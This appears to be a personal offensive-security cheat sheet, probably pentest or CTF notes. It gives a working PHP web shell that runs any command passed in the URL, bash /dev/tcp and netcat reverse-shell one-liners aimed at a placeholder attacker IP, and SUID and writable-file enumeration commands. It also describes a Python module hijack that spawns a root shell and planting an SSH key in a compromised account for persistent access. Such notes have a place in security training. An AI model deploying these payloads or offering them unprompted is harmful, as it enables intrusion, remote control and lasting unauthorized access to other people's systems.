Remote Code Execution (RCE)

Example RCE via file upload: ```html <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="text" name="command" autofocus id="command" size="50"> <input type="submit" value="Execute"> </form> <pre> <?php if(isset($_GET['command'])) { system($_GET['command'] . ' 2>&1'); } ?> </pre> </body> </html> ``` # Commands for initiating a reverse shell: Bash: `bash -i>&/dev/tcp/<your-IP>/<port> 0>&1` Netcat: `nc -e /bin/sh <your-IP> <port>` ## Enumeration Commands for Privilege Escalation: Find SUID (set user ID) files to attempt and execute binaries: `find / -perm -4000 -type f 2>/dev/null` Attempt to find files with writable permissions: `find / -writable -type f 2>/dev/null | grep -v "/proc/"` Say you find a python script that you think you can leverage for some priv esc. You see it is importing some modules and would like to know where those modules are being pulled from (if we can have the script pull our own custom module we can have it do all sorts of things). To do so we can use the following: `python3 -c 'import sys; print(sys.path)'` Getting a shell with /bin/bash Once you find the module you would like to edit you can try this method: ``` import os os.system('/bin/bash') ``` When the py script you are using finds your custom module it will load it and run the above command. ### Enabling SSH on PWND User Accounts When you compromise a user accounts ssh login or perhaps you somehow gained access of the user account and do not have the users password. You can generate a new SSH key pair to enable "passwordless" login via SSH. To do so you first generate the key pair on the local machine: `ssh-keygen -t rsa` Next, copy the generated public key onto the target machine (can use scp or create a local server). If the `.ssh` directory does not exist it must be created along with the `/.ssh/authorized_keys` directory. NOTE: SSH will reject passwordless connections if the .ssh directory has permissions greater than 700 and authorized_keys will do the same as files cannot have permissions greater than 600. So make sure to `chmod 700 /DIRECTORY/.ssh` and `chmod 600 /DIRECTORY/.ssh/authorized_keys`. Boom! now you have access to the compromised user via SSH.